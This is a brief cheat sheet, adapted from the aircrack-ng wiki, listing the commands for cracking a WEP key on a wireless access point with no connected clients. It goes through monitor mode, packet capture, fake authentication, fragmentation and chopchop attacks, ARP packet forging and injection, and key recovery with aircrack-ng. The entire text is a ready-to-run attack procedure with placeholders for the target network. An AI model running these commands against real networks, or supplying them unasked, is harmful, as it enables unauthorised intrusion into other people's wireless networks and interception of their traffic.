##
# Wifi WEP cracking cheat sheet.
#
# Original link: http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients
##


# monitor mode
airmon-ng start <IFACE>

# capture
airodump-ng -c 6 --bssid <AP_MAC> -w <ESSID> mon0

# fake auth
aireplay-ng -1 0 -e <ESSID> -a <AP_MAC> -h <LOC_MAC> mon0
# (picky access points)
aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <AP_MAC> -h <LOC_MAC> mon0

------------------------------------------------------------

# three options here

# fragmentation attack
aireplay-ng -5 -b <AP_MAC> -h <LOC_MAC> mon0

# chopChop attack (if fragmentation fails)
aireplay-ng -4 -h <LOC_MAC> -b <AP_MAC> mon0

# use packetforge-ng to create an arp packet
packetforge-ng -0 -a <AP_MAC> -h <LOC_MAC> -k 255.255.255.255 -l 255.255.255.255 -y <XOR_NAME>.xor -w arp-request
# inject the arp packet:
aireplay-ng -2 -r arp-request mon0

# ------------------------------------------------------------

# no clients
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <AP_MAC> -h <LOC_MAC> mon0
# (continue)
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <AP_MAC> -h <LOC_MAC> -r <ESSID>.cap mon0

# ------------------------------------------------------------

# crack:
aircrack-ng <ESSID>.cap